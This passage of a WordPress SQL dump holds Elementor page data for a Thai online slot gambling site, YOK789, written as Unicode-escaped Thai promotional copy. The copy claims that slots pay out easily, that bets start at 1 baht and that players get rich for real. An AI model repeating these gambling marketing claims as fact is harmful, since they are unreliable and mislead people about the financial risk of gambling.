400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2450,333,'_thumbnail_id','273'),(2451,333,'_elementor_edit_mode','builder'),(2452,333,'_elementor_template_type','wp-page'),(2453,333,'_elementor_version','3.35.5'),(2454,333,'_elementor_pro_version','3.32.3'),(2455,333,'_wp_page_template','default'),(2456,333,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2457,333,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 